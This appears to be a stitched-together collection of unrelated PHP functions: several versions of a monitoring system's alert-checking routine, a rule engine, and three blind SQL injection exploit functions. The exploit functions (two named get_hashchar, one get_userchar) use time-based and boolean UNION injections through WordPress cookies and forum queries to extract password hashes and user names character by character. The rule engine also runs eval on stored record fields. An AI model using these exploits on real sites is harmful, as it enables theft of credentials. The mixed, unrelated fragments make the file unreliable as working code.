function get_hashchar($field, $pos) { global $prefix, $suffix, $id, $testcnt; $char = ''; $cnt = $testcnt * 4; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING({$field},{$pos},1))%s,BENCHMARK({$cnt},MD5(1337)),3)/*"; // First let's determine, if it's number or letter $inj = sprintf($ipattern, $prefix, $id, ">57"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $letter = test_condition($post); if ($letter) { $min = 97; $max = 102; echo "char to find is [a-f]\n"; } else { $min = 48; $max = 57; echo "char to find is [0-9]\n"; } $curr = 0; while (1) { $area = $max - $min; if ($area < 2) { $inj = sprintf($ipattern, $prefix, $id, "={$max}"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $eq = test_condition($post); if ($eq) { $char = chr($max); } else { $char = chr($min); } break; } $half = intval(floor($area / 2)); $curr = $min + $half; $inj = sprintf($ipattern, $prefix, $id, ">{$curr}"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $bigger = test_condition($post); if ($bigger) { $min = $curr; } else { $max = $curr; } echo "curr: {$curr}--{$max}--{$min}\n"; } return $char; }
function treat_rec($rec, $deflist) { global $debug; $has_fired = false; foreach ($deflist as $def) { $fieldname = $def["FIELD"]; $env_field = $def["ENV_FIELD"]; $cell = $rec[$fieldname]; $startvalue = $def["rule_startvalue"]; // initialize the environment with some reasonable knowledge about our world $env = array_merge($def, $rec); // THINK: what's the correct precedence? Should full $rec override the stored environment $rec[$env_field] or not? I'm unsure if ($env_field) { $stored_env = eval("return " . $rec[$env_field] . ";"); $env = array_merge($stored_env, $env); } $env["HAS_FORKED"] = false; $env["IS_SON"] = false; $env["IS_GLOBAL"] = false; $env["LEVEL"] = 0; if (test_location($env, $def["rule_location"]) && value_matches($env, $startvalue, $cell) && test_condition($env, $def["rule_condition"])) { if (!$has_fired) { // before starting the action, remember that we have fired... $firevalue = make_default($def["rule_firevalue"], $cell, "start"); do_writeback($env, $firevalue); $has_fired = true; } // now do the action... $env["VALUE"] = $cell; $ok = do_action($env, $env["rule_action"]); if (!$ok) { // failure: try the next alternative //echo "FAIL......CONTINUE\n"; if (@$env["IS_SON"]) { // mission completed... if ($debug) { echo "forked mission failed.\n"; } exit(-1); } continue; } if (@$env["HAS_FORKED"] || @$env["DO_BREAK"]) { //echo "BREAK......\n"; break; } // record final result of execution, $endvalue = "-1 ENGINE_ERROR"; // sorry, but this should never happen: the HIT_FLAG must always be set because of the $APPEND fallbacks if (@$env["HIT_FLAG"] && @$env["cont_endvalue"]) { $endvalue = make_default($env["cont_endvalue"], $env["VALUE"], "end", 2); } do_writeback($env, $endvalue); // end this record break; } } // only the father process should consider the next record... if (@$env["IS_SON"]) { // mission completed... if ($debug) { echo "forked mission completed.\n"; } exit(0); } }
/** * Check an entity against all relevant alerts * * @param string type * @param array entity * @param array data * @return NULL */ function check_entity($type, $entity, $data) { global $config, $alert_rules, $alert_table, $device; echo "\nChecking alerts\n"; if ($GLOBALS['debug']) { print_vars($data); } list($entity_table, $entity_id_field, $entity_name_field, $entity_ignore_field) = entity_type_translate($type); foreach ($alert_table[$type][$entity[$entity_id_field]] as $alert_test_id => $alert_args) { if ($alert_rules[$alert_test_id]['and']) { $alert = TRUE; } else { $alert = FALSE; } $update_array = array(); if (is_array($alert_rules[$alert_test_id])) { echo "Checking alert " . $alert_test_id . " associated by " . $alert_args['alert_assocs'] . "\n"; foreach ($alert_rules[$alert_test_id]['conditions'] as $test_key => $test) { if (substr($test['value'], 0, 1) == "@") { $ent_val = substr($test['value'], 1); $test['value'] = $entity[$ent_val]; echo " replaced @" . $ent_val . " with " . $test['value'] . " from entity. "; } echo "Testing: " . $test['metric'] . " " . $test['condition'] . " " . $test['value']; $update_array['state']['metrics'][$test['metric']] = $data[$test['metric']]; if (isset($data[$test['metric']])) { echo " (value: " . $data[$test['metric']] . ")"; if (test_condition($data[$test['metric']], $test['condition'], $test['value'])) { // A test has failed. Set the alert variable and make a note of what failed. echo " FAIL "; $update_array['state']['failed'][] = $test; if ($alert_rules[$alert_test_id]['and']) { $alert = $alert && TRUE; } else { $alert = $alert || TRUE; } } else { if ($alert_rules[$alert_test_id]['and']) { $alert = $alert && FALSE; } else { $alert = $alert || FALSE; } echo " OK "; } } else { echo " Metric is not present on entity.\n"; if ($alert_rules[$alert_test_id]['and']) { $alert = $alert && FALSE; } else { $alert = $alert || FALSE; } } } if ($alert) { // Check to see if this alert has been suppressed by anything ## FIXME -- not all of this is implemented // Have all alerts on the device been suppressed? if ($device['ignore']) { $alert_suppressed = TRUE; $suppressed[] = "DEV"; } if (is_numeric($device['ignore_until']) && $device['ignore_until'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "DEV_UNTIL"; } // Have all alerts on the entity been suppressed? if ($entity[$entity_ignore_field]) { $alert_suppressed = TRUE; $suppressed[] = "ENTITY"; } if (is_numeric($entity['ignore_until']) && $entity['ignore_until'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "ENTITY_UNTIL"; } // Have alerts from this alerter been suppressed? if ($alert_rules[$alert_test_id]['ignore']) { $alert_suppressed = TRUE; $suppressed[] = "CHECK"; } if (is_numeric($alert_rules[$alert_test_id]['ignore_until']) && $alert_rules[$alert_test_id]['ignore_until'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "CHECK_UNTIL"; } // Has this specific alert been suppressed? if ($alert_args['ignore']) { $alert_suppressed = TRUE; $suppressed[] = "ENTRY"; } if (is_numeric($alert_args['ignore_until']) && $alert_args['ignore_until'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "ENTRY_UNTIL"; } if (is_numeric($alert_args['ignore_until_ok']) && $alert_args['ignore_until_ok'] == '1') { $alert_suppressed = TRUE; $suppressed[] = "ENTRY_UNTIL_OK"; } $update_array['count'] = $alert_args['count'] + 1; // Check against the alert test's delay if ($update_array['count'] >= $alert_rules[$alert_test_id]['delay'] && $alert_suppressed) { // This alert is valid, but has been suppressed. echo " Checks failed. Alert suppressed (" . implode(', ', $suppressed) . ").\n"; $update_array['alert_status'] = '3'; $update_array['last_message'] = 'Checks failed (Suppressed: ' . implode(', ', $suppressed) . ')'; $update_array['last_checked'] = time(); if ($alert_args['alert_status'] != '3' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); } if (!isset($alert_args['last_failed']) || $alert_args['last_failed'] == '0') { $update_array['last_failed'] = time(); } } elseif ($update_array['count'] >= $alert_rules[$alert_test_id]['delay']) { // This is a real alert. echo " Checks failed. Generate alert.\n"; $update_array['alert_status'] = '0'; $update_array['last_message'] = 'Checks failed'; $update_array['last_checked'] = time(); if ($alert_args['alert_status'] != '0' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); $update_array['last_alerted'] = '0'; } if (!isset($alert_args['last_failed']) || $alert_args['last_failed'] == '0') { $update_array['last_failed'] = time(); } } else { // This is alert needs to exist for longer. echo " Checks failed. Delaying alert.\n"; $update_array['alert_status'] = '2'; $update_array['last_message'] = 'Checks failed (delayed)'; $update_array['last_checked'] = time(); if ($alert_args['alert_status'] != '2' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); } if (!isset($alert_args['last_failed']) || $alert_args['last_failed'] == '0') { $update_array['last_failed'] = time(); } } } else { $update_array['count'] = 0; // Alert conditions passed. Record that we tested it and update status and other data. echo " Checks OK.\n"; $update_array['alert_status'] = '1'; $update_array['last_message'] = 'Checks OK'; $update_array['last_checked'] = time(); #$update_array['count'] = 0; if ($alert_args['alert_status'] != '1' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); } // Status is OK, so disable ignore_until_ok if it has been enabled if ($alert_args['ignore_until_ok'] != '0') { $update_array['ignore_until_ok'] = '0'; } } unset($suppressed); unset($alert_suppressed); // json_encode the state array before we put it into MySQL. $update_array['state'] = json_encode($update_array['state']); #$update_array['alert_table_id'] = $alert_args['alert_table_id']; /// Perhaps this is better done with SQL replace? #print_vars($alert_args); if (!$alert_args['state_entry']) { // State entry seems to be missing. Insert it before we update it. dbInsert(array('alert_table_id' => $alert_args['alert_table_id']), 'alert_table-state'); echo "INSERTING"; } dbUpdate($update_array, 'alert_table-state', '`alert_table_id` = ?', array($alert_args['alert_table_id'])); } else { echo "Alert missing!"; } } }
function get_userchar($pos, $id) { global $prefix; $char = ''; $pattern = 'm.member_id=' . $id . ' AND ORD(SUBSTR(m.name,' . $pos . ',1))'; // First let's determine, if it's number or letter $post = $pattern . '%253e57'; $letter = test_condition($post); if ($letter) { $min = 65; $max = 122; xecho("Char to find is [a-f]\n"); } else { $min = 48; $max = 57; xecho("Char to find is [0-9]\n"); } $curr = 0; while (1) { $area = $max - $min; if ($area < 2) { $post = $pattern . "={$max}"; $eq = test_condition($post); if ($eq) { $char = chr($max); } else { $char = chr($min); } break; } $half = intval(floor($area / 2)); $curr = $min + $half; $post = $pattern . '%253e' . $curr; $bigger = test_condition($post); if ($bigger) { $min = $curr; } else { $max = $curr; } xecho("Current test: {$curr}-{$max}-{$min}\n"); } return $char; }
function check_entity($type, $entity, $data) { global $config, $alert_rules, $alert_table, $device; print_message("\n检测警报"); if (OBS_DEBUG) { print_vars($data); } list($entity_table, $entity_id_field, $entity_name_field, $entity_ignore_field) = entity_type_translate($type); if (!isset($alert_table[$type][$entity[$entity_id_field]])) { return; } // Just return to avoid PHP warnings $alert_info = array('entity_type' => $type, 'entity_id' => $entity[$entity_id_field]); foreach ($alert_table[$type][$entity[$entity_id_field]] as $alert_test_id => $alert_args) { if ($alert_rules[$alert_test_id]['and']) { $alert = TRUE; } else { $alert = FALSE; } $alert_info['alert_test_id'] = $alert_test_id; $update_array = array(); if (is_array($alert_rules[$alert_test_id])) { echo "测试中警报 " . $alert_test_id . " associated by " . $alert_args['alert_assocs'] . "\n"; foreach ($alert_rules[$alert_test_id]['conditions'] as $test_key => $test) { if (substr($test['value'], 0, 1) == "@") { $ent_val = substr($test['value'], 1); $test['value'] = $entity[$ent_val]; echo " replaced @" . $ent_val . " with " . $test['value'] . " from entity. "; } echo "测试中: " . $test['metric'] . " " . $test['condition'] . " " . $test['value']; $update_array['state']['metrics'][$test['metric']] = $data[$test['metric']]; if (isset($data[$test['metric']])) { echo " (值: " . $data[$test['metric']] . ")"; if (test_condition($data[$test['metric']], $test['condition'], $test['value'])) { // A test has failed. Set the alert variable and make a note of what failed. echo " 失败 "; $update_array['state']['failed'][] = $test; if ($alert_rules[$alert_test_id]['and']) { $alert = $alert && TRUE; } else { $alert = $alert || TRUE; } } else { if ($alert_rules[$alert_test_id]['and']) { $alert = $alert && FALSE; } else { $alert = $alert || FALSE; } echo " OK "; } } else { echo " 测量单位不存在.\n"; if ($alert_rules[$alert_test_id]['and']) { $alert = $alert && FALSE; } else { $alert = $alert || FALSE; } } } if ($alert) { // Check to see if this alert has been suppressed by anything ## FIXME -- not all of this is implemented // Have all alerts been suppressed? if ($config['alerts']['suppress']) { $alert_suppressed = TRUE; $suppressed[] = "GLOBAL"; } // Have all alerts on the device been suppressed? if ($device['ignore']) { $alert_suppressed = TRUE; $suppressed[] = "DEV"; } if ($device['ignore_until']) { $device['ignore_until_time'] = strtotime($device['ignore_until']); if ($device['ignore_until_time'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "DEV_UNTIL"; echo ' DEVSUPP '; } } // Have all alerts on the entity been suppressed? if ($entity[$entity_ignore_field]) { $alert_suppressed = TRUE; $suppressed[] = "ENTITY"; } if (is_numeric($entity['ignore_until']) && $entity['ignore_until'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "ENTITY_UNTIL"; } // Have alerts from this alerter been suppressed? if ($alert_rules[$alert_test_id]['ignore']) { $alert_suppressed = TRUE; $suppressed[] = "CHECK"; } if ($alert_rules[$alert_test_id]['ignore_until']) { $alert_rules[$alert_test_id]['ignore_until_time'] = strtotime($alert_rules[$alert_test_id]['ignore_until']); if ($alert_rules[$alert_test_id]['ignore_until_time'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "CHECK_UNTIL"; } } // Has this specific alert been suppressed? if ($alert_args['ignore']) { $alert_suppressed = TRUE; $suppressed[] = "ENTRY"; } if ($alert_args['ignore_until']) { $alert_args['ignore_until_time'] = strtotime($alert_args['ignore_until']); if ($alert_args['ignore_until_time'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "ENTRY_UNTIL"; } } if (is_numeric($alert_args['ignore_until_ok']) && $alert_args['ignore_until_ok'] == '1') { $alert_suppressed = TRUE; $suppressed[] = "ENTRY_UNTIL_OK"; } $update_array['count'] = $alert_args['count'] + 1; // Check against the alert test's delay if ($alert_args['count'] >= $alert_rules[$alert_test_id]['delay'] && $alert_suppressed) { // This alert is valid, but has been suppressed. echo " Checks failed. Alert suppressed (" . implode(', ', $suppressed) . ").\n"; $update_array['alert_status'] = '3'; $update_array['last_message'] = '检测失败(限制: ' . implode(', ', $suppressed) . ')'; $update_array['last_checked'] = time(); if ($alert_args['alert_status'] != '3' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); log_alert('检测错误但是报警被 [' . implode($suppressed, ',') . ']', $device, $alert_info, 'FAIL_SUPPRESSED'); } if (!isset($alert_args['last_failed']) || $alert_args['last_failed'] == '0') { $update_array['last_failed'] = time(); } } elseif ($alert_args['count'] >= $alert_rules[$alert_test_id]['delay']) { // This is a real alert. echo " 检查失败. 生成警报.\n"; $update_array['alert_status'] = '0'; $update_array['last_message'] = '检测失败'; $update_array['last_checked'] = time(); if ($alert_args['alert_status'] != '0' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); $update_array['last_alerted'] = '0'; log_alert('检测错误', $device, $alert_info, 'FAIL'); } if (!isset($alert_args['last_failed']) || $alert_args['last_failed'] == '0') { $update_array['last_failed'] = time(); } } else { // This is alert needs to exist for longer. echo " Checks failed. Delaying alert.\n"; $update_array['alert_status'] = '2'; $update_array['last_message'] = '检测失败(延迟)'; $update_array['last_checked'] = time(); if ($alert_args['alert_status'] != '2' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); log_alert('检查失败但警报延迟', $device, $alert_info, 'FAIL_DELAYED'); } if (!isset($alert_args['last_failed']) || $alert_args['last_failed'] == '0') { $update_array['last_failed'] = time(); } } } else { $update_array['count'] = 0; // Alert conditions passed. Record that we tested it and update status and other data. echo " Checks OK.\n"; $update_array['alert_status'] = '1'; $update_array['last_message'] = '检测OK'; $update_array['last_checked'] = time(); #$update_array['count'] = 0; if ($alert_args['alert_status'] != '1' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); log_alert('Checks succeeded', $device, $alert_info, 'OK'); } // Status is OK, so disable ignore_until_ok if it has been enabled if ($alert_args['ignore_until_ok'] != '0') { $update_entry_array['ignore_until_ok'] = '0'; } } unset($suppressed); unset($alert_suppressed); // json_encode the state array before we put it into MySQL. $update_array['state'] = json_encode($update_array['state']); #$update_array['alert_table_id'] = $alert_args['alert_table_id']; /// Perhaps this is better done with SQL replace? #print_vars($alert_args); if (!$alert_args['state_entry']) { // State entry seems to be missing. Insert it before we update it. dbInsert(array('alert_table_id' => $alert_args['alert_table_id']), 'alert_table-state'); echo "INSERTING"; } dbUpdate($update_array, 'alert_table-state', '`alert_table_id` = ?', array($alert_args['alert_table_id'])); if (is_array($update_entry_array)) { dbUpdate($update_entry_array, 'alert_table', '`alert_table_id` = ?', array($alert_args['alert_table_id'])); } if (TRUE) { // Write RRD data $rrd = "alert-" . $alert_args['alert_table_id'] . ".rrd"; rrdtool_create($device, $rrd, "DS:status:GAUGE:600:0:1 DS:code:GAUGE:600:-7:7"); if ($update_array['alert_status'] == "1") { // Status is up rrdtool_update($device, $rrd, "N:1:" . $update_array['alert_status']); } else { rrdtool_update($device, $rrd, "N:0:" . $update_array['alert_status']); } } } else { echo "报警错误!"; } } }
/** * Check entity data against alert conditions * * @param value_a * @param condition * @param value_b */ function check_entity($device, $entity_type, $entity_id, $data) { global $glo_conditions; global $dev_conditions; if (!empty($entity_id)) { echo " {$entity_id}"; } foreach ($data as $name => $value) { foreach ($dev_conditions[$entity_type][$entity_id][$name] as $condition) { $alert = test_condition($value, $condition['condition'], $condition['value']); if ($alert == 1) { echo "ALERT "; } else { echo "OK "; } } } }
function get_hashchar($pos) { global $prefix, $id; $char = ''; $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id={$id} AND ORD(SUBSTR(converge_pass_hash,{$pos},1))"; // First let's determine, if it's number or letter $post = $pattern . '%253e57'; $letter = test_condition($post); if ($letter) { $min = 97; $max = 102; xecho("Char to find is [a-f]\n"); } else { $min = 48; $max = 57; xecho("Char to find is [0-9]\n"); } $curr = 0; while (1) { $area = $max - $min; if ($area < 2) { $post = $pattern . "={$max}"; $eq = test_condition($post); if ($eq) { $char = chr($max); } else { $char = chr($min); } break; } $half = intval(floor($area / 2)); $curr = $min + $half; $post = $pattern . '%253e' . $curr; $bigger = test_condition($post); if ($bigger) { $min = $curr; } else { $max = $curr; } xecho("Current test: {$curr}-{$max}-{$min}\n"); } return $char; }
function check_entity($entity_type, $entity, $data) { global $config, $alert_rules, $alert_table, $device; $alert_output = ""; if (OBS_DEBUG) { print_vars($data); } list($entity_table, $entity_id_field, $entity_name_field, $entity_ignore_field) = entity_type_translate($entity_type); if (!isset($alert_table[$entity_type][$entity[$entity_id_field]])) { return; } // Just return to avoid PHP warnings $alert_info = array('entity_type' => $entity_type, 'entity_id' => $entity[$entity_id_field]); foreach ($alert_table[$entity_type][$entity[$entity_id_field]] as $alert_test_id => $alert_args) { if ($alert_rules[$alert_test_id]['and']) { $alert = TRUE; } else { $alert = FALSE; } $alert_info['alert_test_id'] = $alert_test_id; $alert_checker = $alert_rules[$alert_test_id]; $update_array = array(); if (is_array($alert_rules[$alert_test_id])) { //echo("Checking alert ".$alert_test_id." associated by ".$alert_args['alert_assocs']."\n"); $alert_output .= $alert_rules[$alert_test_id]['alert_name'] . " ["; foreach ($alert_rules[$alert_test_id]['conditions'] as $test_key => $test) { if (substr($test['value'], 0, 1) == "@") { $ent_val = substr($test['value'], 1); $test['value'] = $entity[$ent_val]; //echo(" replaced @".$ent_val." with ". $test['value'] ." from entity. "); } //echo("Testing: " . $test['metric']. " ". $test['condition'] . " " .$test['value']); $update_array['state']['metrics'][$test['metric']] = $data[$test['metric']]; if (isset($data[$test['metric']])) { //echo(" (value: ".$data[$test['metric']].")"); if (test_condition($data[$test['metric']], $test['condition'], $test['value'])) { // A test has failed. Set the alert variable and make a note of what failed. //print_cli("%R[FAIL]%N"); $update_array['state']['failed'][] = $test; if ($alert_rules[$alert_test_id]['and']) { $alert = $alert && TRUE; } else { $alert = $alert || TRUE; } } else { if ($alert_rules[$alert_test_id]['and']) { $alert = $alert && FALSE; } else { $alert = $alert || FALSE; } //print_cli("%G[OK]%N"); } } else { //echo(" Metric is not present on entity.\n"); if ($alert_rules[$alert_test_id]['and']) { $alert = $alert && FALSE; } else { $alert = $alert || FALSE; } } } if ($alert) { // Check to see if this alert has been suppressed by anything ## FIXME -- not all of this is implemented // Have all alerts been suppressed? if ($config['alerts']['suppress']) { $alert_suppressed = TRUE; $suppressed[] = "GLOBAL"; } // Is there a global scheduled maintenance? if (isset($GLOBALS['cache']['maint']['global']) && count($GLOBALS['cache']['maint']['global']) > 0) { $alert_suppressed = TRUE; $suppressed[] = "MNT_GBL"; } // Have all alerts on the device been suppressed? if ($device['ignore']) { $alert_suppressed = TRUE; $suppressed[] = "DEV"; } if ($device['ignore_until']) { $device['ignore_until_time'] = strtotime($device['ignore_until']); if ($device['ignore_until_time'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "DEV_U"; } } if (isset($GLOBALS['cache']['maint'][$entity_type][$entity[$entity_id_field]])) { $alert_suppressed = TRUE; $suppressed[] = "MNT_ENT"; } if (isset($GLOBALS['cache']['maint']['alert_checker'][$alert_test_id])) { $alert_suppressed = TRUE; $suppressed[] = "MNT_CHK"; } if (isset($GLOBALS['cache']['maint']['device'][$device['device_id']])) { $alert_suppressed = TRUE; $suppressed[] = "MNT_DEV"; } // Have all alerts on the entity been suppressed? if ($entity[$entity_ignore_field]) { $alert_suppressed = TRUE; $suppressed[] = "ENT"; } if (is_numeric($entity['ignore_until']) && $entity['ignore_until'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "ENT_U"; } // Have alerts from this alerter been suppressed? if ($alert_rules[$alert_test_id]['ignore']) { $alert_suppressed = TRUE; $suppressed[] = "CHECK"; } if ($alert_rules[$alert_test_id]['ignore_until']) { $alert_rules[$alert_test_id]['ignore_until_time'] = strtotime($alert_rules[$alert_test_id]['ignore_until']); if ($alert_rules[$alert_test_id]['ignore_until_time'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "CHECK_UNTIL"; } } // Has this specific alert been suppressed? if ($alert_args['ignore']) { $alert_suppressed = TRUE; $suppressed[] = "ENTRY"; } if ($alert_args['ignore_until']) { $alert_args['ignore_until_time'] = strtotime($alert_args['ignore_until']); if ($alert_args['ignore_until_time'] > time()) { $alert_suppressed = TRUE; $suppressed[] = "ENTRY_UNTIL"; } } if (is_numeric($alert_args['ignore_until_ok']) && $alert_args['ignore_until_ok'] == '1') { $alert_suppressed = TRUE; $suppressed[] = "ENTRY_UNTIL_OK"; } $update_array['count'] = $alert_args['count'] + 1; // Check against the alert test's delay if ($alert_args['count'] >= $alert_rules[$alert_test_id]['delay'] && $alert_suppressed) { // This alert is valid, but has been suppressed. //echo(" Checks failed. Alert suppressed (".implode(', ', $suppressed).").\n"); $alert_output .= "%PFS%N"; $update_array['alert_status'] = '3'; $update_array['last_message'] = 'Checks failed (Suppressed: ' . implode(', ', $suppressed) . ')'; $update_array['last_checked'] = time(); if ($alert_args['alert_status'] != '3' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); $log_id = log_alert('Checks failed but alert suppressed by [' . implode($suppressed, ',') . ']', $device, $alert_info, 'FAIL_SUPPRESSED'); } $update_array['last_failed'] = time(); } elseif ($alert_args['count'] >= $alert_rules[$alert_test_id]['delay']) { // This is a real alert. //echo(" Checks failed. Generate alert.\n"); $alert_output .= "%PF!%N"; $update_array['alert_status'] = '0'; $update_array['last_message'] = 'Checks failed'; $update_array['last_checked'] = time(); if ($alert_args['alert_status'] != '0' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); $update_array['last_alerted'] = '0'; $log_id = log_alert('Checks failed', $device, $alert_info, 'FAIL'); } $update_array['last_failed'] = time(); } else { // This is alert needs to exist for longer. //echo(" Checks failed. Delaying alert.\n"); $alert_output .= "%OFD%N"; $update_array['alert_status'] = '2'; $update_array['last_message'] = 'Checks failed (delayed)'; $update_array['last_checked'] = time(); if ($alert_args['alert_status'] != '2' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); $log_id = log_alert('Checks failed but alert delayed', $device, $alert_info, 'FAIL_DELAYED'); } $update_array['last_failed'] = time(); } } else { $update_array['count'] = 0; // Alert conditions passed. Record that we tested it and update status and other data. $alert_output .= "%gOK%N"; $update_array['alert_status'] = '1'; $update_array['last_message'] = 'Checks OK'; $update_array['last_checked'] = time(); #$update_array['count'] = 0; if ($alert_args['alert_status'] != '1' || $alert_args['last_changed'] == '0') { $update_array['last_changed'] = time(); $log_id = log_alert('Checks succeeded', $device, $alert_info, 'OK'); } $update_array['last_ok'] = time(); // Status is OK, so disable ignore_until_ok if it has been enabled if ($alert_args['ignore_until_ok'] != '0') { $update_entry_array['ignore_until_ok'] = '0'; } } unset($suppressed); unset($alert_suppressed); // json_encode the state array before we put it into MySQL. $update_array['state'] = json_encode($update_array['state']); #$update_array['alert_table_id'] = $alert_args['alert_table_id']; /// Perhaps this is better done with SQL replace? #print_vars($alert_args); //if (!$alert_args['state_entry']) //{ // State entry seems to be missing. Insert it before we update it. //dbInsert(array('alert_table_id' => $alert_args['alert_table_id']), 'alert_table-state'); // echo("I+"); //} dbUpdate($update_array, 'alert_table', '`alert_table_id` = ?', array($alert_args['alert_table_id'])); if (is_array($update_entry_array)) { dbUpdate($update_entry_array, 'alert_table', '`alert_table_id` = ?', array($alert_args['alert_table_id'])); } if (TRUE) { // Write RRD data if ($update_array['alert_status'] == "1") { // Status is up rrdtool_update_ng($device, 'alert', array('status' => 1, 'code' => $update_array['alert_status']), $alert_args['alert_table_id']); } else { rrdtool_update_ng($device, 'alert', array('status' => 0, 'code' => $update_array['alert_status']), $alert_args['alert_table_id']); } } } else { $alert_output .= "%RAlert missing!%N"; } $alert_output .= "] "; } $alert_output .= "%n"; if ($entity_type == "device") { $cli_level = 1; } else { $cli_level = 3; } //print_cli_data("Checked Alerts", $alert_output, $cli_level); }